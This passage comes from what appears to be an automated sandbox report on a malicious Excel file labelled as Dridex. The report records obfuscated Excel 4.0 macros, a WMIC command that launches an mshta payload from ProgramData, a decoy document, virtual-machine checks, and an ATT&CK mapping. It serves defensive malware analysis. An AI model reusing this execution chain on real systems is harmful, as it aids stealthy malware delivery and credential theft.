(x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=VAMYDFPUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsl
      Found obfuscated Excel 4.0 MacroShow sources
      Source: Complaint details 143595.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 25
      Source: Complaint details 143595.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: Complaint details 143595.xlsbReversingLabs: Detection: 37%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\KBjfhfmoGRoN.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\KBjfhfmoGRoN.rtfJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D97D8974-8AA9-4518-89EA-81E7D640DC2A} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@7/5@0/0
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Complaint details 143595.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: Complaint details 143595.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: cmd line: kbjfhfmogron.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: kbjfhfmogron.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: EXCEL.EXE, 00000000.00000003.303250691.0000000012F80000.00000004.00000001.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{
      Source: EXCEL.EXE, 00000000.00000003.302443445.0000000013094000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
      Source: EXCEL.EXE, 00000000.00000002.583333401.000000000D813000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
      Source: EXCEL.EXE, 00000000.00000002.583588075.000000000DE6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388807778.000000000DE6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.452187991.000000000DE6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.421844667.000000000DE6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501304508.000000000DE6D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: EXCEL.EXEBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volum
      Source: EXCEL.EXE, 00000000.00000003.452129399.000000000DE12000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.421704165.000000000DE12000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388756817.000000000DE12000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583525905.000000000DE12000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501173984.000000000DE12000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW.microsoft.com
      Source: EXCEL.EXE, 00000000.00000003.302273593.0000000012F80000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\KBjfhfmoGRoN.rtfJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.574595534.0000000002E90000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.574106503.0000026161C20000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: EXCEL.EXE, 00000000.00000002.574595534.0000000002E90000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.574106503.0000026161C20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.574595534.0000000002E90000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.574106503.0000026161C20000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.574595534.0000000002E90000.00000002.00020000.sdmp, mshta.exe, 0000000D.00000002.574106503.0000026161C20000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution2Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery14Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Complaint details 143595.xlsb38%ReversingLabsDocument-Excel.Infostealer.Dridex

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://substrate.office.comy7g0%Avira URL Cloudsafe
      https://cdn.entity.0%URL Reputationsafe
      https://api.office.netp~0%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://settings.outlook.comSH90%Avira URL Cloudsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://onedrive.live.com($0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://substrate.office.comp7h0%Avira URL Cloudsafe
      https://substrate.office.coml0%Avira URL Cloudsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://substrate.office.com%60%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://onedrive.live.comed0%Avira URL Cloudsafe
      https://shell.suite.office.com:1443q0%Avira URL Cloudsafe
      https://globaldisco.crm.dynamics.como0%Avira URL Cloudsafe
      http://www.w3.o0%URL Reputationsafe
      https://substrate.office.com340%Avira URL Cloudsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://substrate.office.comC60%Avira URL Cloudsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://staging.cortana.ai0%URL Reputationsafe
      https://substrate.office.comt60%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://outlook.office365.com/autodiscover/autodiscover.jsonlgbEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
        		high
        https://shell.suite.office.com:144301ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
          		high
          https://login.windows.net/common/oauth2/authorizesJEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
            		high
            https://substrate.office.comy7gEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000003.502288674.000000000DEC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.583692161.000000000DEC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501376996.000000000DEC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308636150.000000000DEC7000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
              		high
              https://login.windows.net/common/oauth2/authorizebJEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                  		high
                  https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2:R)EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                    		high
                    https://cdn.entity.01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.office.netp~EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                      		high
                      https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                        		high
                        https://settings.outlook.comSH9EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://login.windows.net/common/oauth2/authorizerMEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                            		high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                              		high
                              https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://visio.uservoice.com/forums/368202-visio-on-devicesVh8EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                		high
                                https://onedrive.live.com($EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
